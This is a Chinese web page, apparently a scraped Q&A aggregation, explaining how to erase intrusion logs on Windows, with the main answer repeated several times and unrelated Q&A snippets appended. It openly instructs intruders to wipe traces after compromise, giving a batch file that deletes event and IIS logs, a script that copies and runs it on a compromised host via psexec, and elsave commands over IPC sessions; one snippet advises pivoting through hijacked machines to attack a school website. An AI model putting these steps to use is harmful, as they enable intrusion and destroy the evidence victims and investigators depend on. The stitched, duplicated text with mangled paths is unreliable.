如何清除入侵日志!

作者&投稿:畅秋 (若有异议请与网页底部的电邮联系)
如何清除入侵日志!~

一、日志文件的位置Windows 2000的系统日志文件有应用程序日志,安全日志、系统日志、DNS服务器日志等等,应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%system32config。安全日志文件:%systemroot%system32configSecEvent.EVT系统日志文件:%systemroot%system32configSysEvent.EVT应用程序日志文件:%systemroot%system32configAppEvent.EVT有的管理员很可能将这些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目录。二、清除自己电脑中的日志如果你要清除自己电脑中的日志,可以用管理员的身份来登录Windows,然后在“控制面板”中进入“管理工具”,再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了,里面有应用程序、安全和系统日志文件。举个例子,比方说你想清除安全日志,可以右键点击“安全日志”,在弹出的菜单中选择“属性”。接下来在弹出的对话框中,点击下面“清除日志”按钮就可以清除了,如果你想以后再来清除这些日志的话,可以将“按需要改写尺寸”,这样就可以在达到最大日志尺寸时进行改写事件了,不会提示你清除日志。三、清除远程主机上的日志大多数情况下,IIS的日志会忠实地记录它接收到的任何请求(也有特殊的不被IIS记录的攻击),一个优秀的系统管理员会利用这点来发现入侵的企图,保护自己的系统。所以如果你是黑客,入侵系统成功后第一件事便是清除日志,擦去自己的形迹,这时可以用以下两个办法:一是自己编写批处理文件来解决,编写一个能清除日志的批处理非常简单,方法是:新建一个具有如下内容的批处理文件:@del c:winntsystem32logfiles*.*@del c:winntsystem32config*.evt@del c:winntsystem32dtclog*.*@del c:winntsystem32*.log@del c:winntsystem32*.txt@del c:winnt*.txt@del c:winnt*.log@del c:del.bat把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,另外del命令大家一定清楚吧?它是删除文件命令。接下来再新建一个批处理文件,内容如下:@copy del.bat \%1c$@echo 向肉鸡复制本机的del.bat……OK@psexec \%1 c:del.bat@echo 在肉鸡上运行del.bat,清除日志文件……OK保存为clean.bat即可,假设已经与肉鸡进行了Ipc连接,然后在CMD下输入:clean.bat 肉鸡IP,即可清除肉鸡上的日志文件。清除日志的另外一个方法是借助第三方软件,如著名黑客软件流光的开发者黑客小榕的elsave.exe,就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件,大家可以在网上下载到。

安全日志文件:%systemroot%system32configSecEvent.EVT 系统日志文件:%systemroot%system32configSysEvent.EVT 应用程序日志文件:%systemroot%system32configAppEvent.EVT 有的管理员很可能将这些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目录。 二、清除自己电脑中的日志 如果你要清除自己电脑中的日志,可以用管理员的身份来登录Windows,然后在“控制面板”中进入“管理工具”,再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了,里面有应用程序、安全和系统日志文件。举个例子,比方说你想清除安全日志,可以右键点击“安全日志”,在弹出的菜单中选择“属性”。接下来在弹出的对话框中,点击下面“清除日志”按钮就可以清除了,如果你想以后再来清除这些日志的话,可以将“按需要改写尺寸”,这样就可以在达到最大日志尺寸时进行改写事件了,不会提示你清除日志。 三、清除远程主机上的日志 大多数情况下,IIS的日志会忠实地记录它接收到的任何请求(也有特殊的不被IIS记录的攻击),一个优秀的系统管理员会利用这点来发现入侵的企图,保护自己的系统。所以如果你是黑客,入侵系统成功后第一件事便是清除日志,擦去自己的形迹,这时可以用以下两个办法:一是自己编写批处理文件来解决,编写一个能清除日志的批处理非常简单,方法是:新建一个具有如下内容的批处理文件: @del c:winntsystem32logfiles*.* @del c:winntsystem32config*.evt @del c:winntsystem32dtclog*.* @del c:winntsystem32*.log @del c:winntsystem32*.txt @del c:winnt*.txt @del c:winnt*.log @del c:del.bat 把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,另外del命令大家一定清楚吧?它是删除文件命令。

一、日志文件的位置

Windows 2000的系统日志文件有应用程序日志,安全日志、系统日志、DNS服务器日志等等,应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%system32config。

安全日志文件:%systemroot%system32configSecEvent.EVT

系统日志文件:%systemroot%system32configSysEvent.EVT

应用程序日志文件:%systemroot%system32configAppEvent.EVT

有的管理员很可能将这些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目录。

二、清除自己电脑中的日志

如果你要清除自己电脑中的日志,可以用管理员的身份来登录Windows,然后在“控制面板”中进入“管理工具”,再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了,里面有应用程序、安全和系统日志文件。举个例子,比方说你想清除安全日志,可以右键点击“安全日志”,在弹出的菜单中选择“属性”。接下来在弹出的对话框中,点击下面“清除日志”按钮就可以清除了,如果你想以后再来清除这些日志的话,可以将“按需要改写尺寸”,这样就可以在达到最大日志尺寸时进行改写事件了,不会提示你清除日志。

三、清除远程主机上的日志

大多数情况下,IIS的日志会忠实地记录它接收到的任何请求(也有特殊的不被IIS记录的攻击),一个优秀的系统管理员会利用这点来发现入侵的企图,保护自己的系统。所以如果你是黑客,入侵系统成功后第一件事便是清除日志,擦去自己的形迹,这时可以用以下两个办法:一是自己编写批处理文件来解决,编写一个能清除日志的批处理非常简单,方法是:新建一个具有如下内容的批处理文件:

@del c:winntsystem32logfiles*.*

@del c:winntsystem32config*.evt

@del c:winntsystem32dtclog*.*

@del c:winntsystem32*.log

@del c:winntsystem32*.txt

@del c:winnt*.txt

@del c:winnt*.log

@del c:del.bat

把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,另外del命令大家一定清楚吧?它是删除文件命令。

接下来再新建一个批处理文件,内容如下:

@copy del.bat \%1c$

@echo 向肉鸡复制本机的del.bat……OK

@psexec \%1 c:del.bat

@echo 在肉鸡上运行del.bat,清除日志文件……OK

保存为clean.bat即可,假设已经与肉鸡进行了Ipc连接,然后在CMD下输入:clean.bat 肉鸡IP,即可清除肉鸡上的日志文件。

清除日志的另外一个方法是借助第三方软件,如著名黑客软件流光的开发者黑客小榕的elsave.exe,就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件,大家可以在网上下载到。elsave.exe使用起来很简单,首先利用获得的管理员账号与对方建立IPC会话:net use \ip pass /user: user,然后在命令行下执行如下命令:elsave -s \ip -l application -C,这样就删除了安全日志。

重装系统啊! 怎么哪里都有中奖信息啊!骗子!!!

给你们4天时间,你们要是回答不出我来回答

政府网站遭到黑客入侵应如何处理
答:(3)打补丁查漏洞 当程序漏洞被公布时,程序官方都会发布程序的补丁文件,只需要到程序的官方网站下载相应的文件,按照说明上传到网站空间覆盖原文件即可。如果暂时没有出现相关的补丁,则可以暂时禁用或删除某些功能文件。接着我们可以查看网站的访问日志,找出访问木马程序的IP地址记录,根据查询到的IP地址,...

我想入侵我们学校的网站而且还不留痕迹,怎么才能做到?
答:而且有记录的话,亦不算得上是安全的。wingate亦可以当成是跳板的,不过不是很方便。2.在肉鸡上建立跳板,这种方法是比较安全的。传统方法是在肉鸡上增加一个admin权限的帐户,然后启动telnet服务,在入侵时先telnet上这台肉鸡,再通过网鸡telnet上要入侵的服务器,完成入侵后就将肉鸡上的telnet日志清掉...

如何利用遭遇攻击的系统日志
答:这是登录失败的记录信息: Apr 29 22:05:45 game PAM_pwdb[29509]: (login) session opened for user ncx by (uid=0)。第一步应该是 Kill -HUP cat `/var/run/syslogd.pid`,当然,有可能入侵者已经做过了。2. wtmp,utmp logs,FTP日志 你可以在/var/adm,/var/log,/etc目录中...

网站被黑客入侵后处理方式包括
答:这些账户都是具有特殊权限的,黑客可以通过他们得到系统权限!6、Web服务器一般都是通过网站漏洞入侵的,你需要对网站程序进行检查(配合上面的日志分析),对所有网站可以进行上传、写入shell的地方进行严格的检查和处理。如果不能完全确认攻击者通过哪些攻击方式进行攻击,那就重装系统,彻底清除掉攻击源。

系统检测到入侵工具如何操作
答:3. 及时通知相关人员,包括管理员、安全团队和其他相关人员,以便他们能够采取相应的措施。4. 收集和分析入侵活动的证据,包括日志、异常行为和网络流量等,以便进行后续的调查和取证。5. 定期更新和升级系统软件和安全配置,以确保系统的安全性和稳定性。总之,在应对入侵工具时,应该采取积极主动的措施,...

电脑被黑客入侵
答:分别用来清除登陆日志。(4).退出路由器登陆,通过工具清除远程桌面主机上的登陆日志,然后删除登录用帐户和用户目录,注销用户。总结:上面笔者结合实例演示了入侵者如何通过跳板进行入侵以及入侵善后的全过程,本文只是从技术的角度对跳板技术进行解析,目的是让有兴趣的读者直观地了解跳板技术的相关细节。当然...

如何解决ARP病毒入侵
答:ARP攻击是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。解决方法:下载腾讯电脑管家,卡巴斯基等防护软件,当受到arp攻击时,根据提示进行ip-mac绑定就可以了!

“蠕虫病毒”是什么?
答:想必大家对入侵的一般步骤都是比较熟悉的。我们简单回忆一下。 第一步:用各种方法收集目标主机的信息,找到可利用的漏洞或弱点。 第二步:针对目标主机的漏洞或缺陷,采取相应的技术攻击主机,直到获得主机的管理员权限。 第三步:利用获得的权限在主机上安装后门、跳板、控制端、监视器等等,清除日志。 我们一步一步...

服务器被攻击怎么办?
答:服务器被攻击怎么办 安装软件防火墙, 可以对一定的攻击行为进行拦截和防御。可以用安全狗来防护,防黑抗攻击杀病毒。 查看系统日志,日记服务可以记录黑客的行踪,通过日志看下入侵者在系统上做过什么手脚,在系统上留了哪些后门,给系统造成了哪些破坏及隐患,服务器到底还存在哪些安全漏洞等,建议可以查看下日志。 做好...

手把手教你如何看路由器日志
答:Syslog设备是一个网络攻击者的显着目标,通过修改日志来隐藏入侵痕迹,因此我们要特别注意。最好养成每周(或更短的时间)定期检查一次记录文件的习惯,并将过期的记录文件依照流水号或是日期备份,以后查阅时也比较容易。千万不要记录下*.*,这样无论什么都被记录下来,结果会导致文件太大,要找资料时根本...